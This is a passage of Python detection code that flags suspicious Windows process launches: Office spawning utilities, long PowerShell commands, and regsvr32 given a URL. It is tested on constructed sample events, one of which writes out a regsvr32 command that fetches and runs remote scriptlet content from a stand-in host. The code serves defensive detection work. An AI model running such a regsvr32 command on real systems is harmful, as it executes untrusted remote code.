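MAX_POWERSHELL_CMDLINE = 1000  # assumed threshold, not AMP's; tune to your baseline
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def classify(event):
    """Return the names of the rules that fire for one process-creation event."""
    parent = basename(event["parent_image"]).lower()
    image = basename(event["image"]).lower()
    cmdline = event["command_line"]
    hits = []
    if parent in OFFICE_PARENTS and image in WINDOWS_UTILITIES:
        hits.append("office_spawned_windows_utility")
    if image == "powershell.exe" and len(cmdline) > MAX_POWERSHELL_CMDLINE:
        hits.append("long_powershell_command")
    # regsvr32 normally registers local DLLs; a URL argument means remote script content.
    if image == "regsvr32.exe" and URL_RE.search(cmdline):
        hits.append("regsvr32_remote_script")
    return hits

def triage(events):
    """Keep only the events that matched at least one rule."""
    results = [(e["image"], classify(e)) for e in events]
    return [(image, hits) for image, hits in results if hits]

def make_event(parent_image, image, command_line):
    return {"parent_image": parent_image, "image": image, "command_line": command_line}

SYS32 = "C:\\Windows\\System32\\"
OFFICE = "C:\\Program Files\\Microsoft Office\\root\\Office16\\"
# Constructed sample events; none of them come from the post's telemetry.
SAMPLE_EVENTS = [
    make_event(OFFICE + "WINWORD.EXE", SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe",
               "powershell.exe -Command " + "A" * 1500),
    make_event("C:\\Windows\\explorer.exe", SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe",
               "powershell.exe Get-ChildItem"),
    make_event(OFFICE + "EXCEL.EXE", SYS32 + "cmd.exe", "cmd.exe /c dir"),
    make_event(SYS32 + "cmd.exe", SYS32 + "regsvr32.exe",
               "regsvr32.exe /s /i:http://example.invalid/a.sct scrobj.dll"),
    make_event("C:\\Windows\\explorer.exe", SYS32 + "regsvr32.exe",
               "regsvr32.exe /s C:\\Temp\\local.dll"),
]

if __name__ == "__main__":
    for image, hits in triage(SAMPLE_EVENTS):
        print(image, "->", ", ".join(hits))
```

These rules match on image file names, so a renamed copy of a utility will not trigger them; pairing them with the original file name from the binary's version metadata, where your telemetry records it, closes that gap.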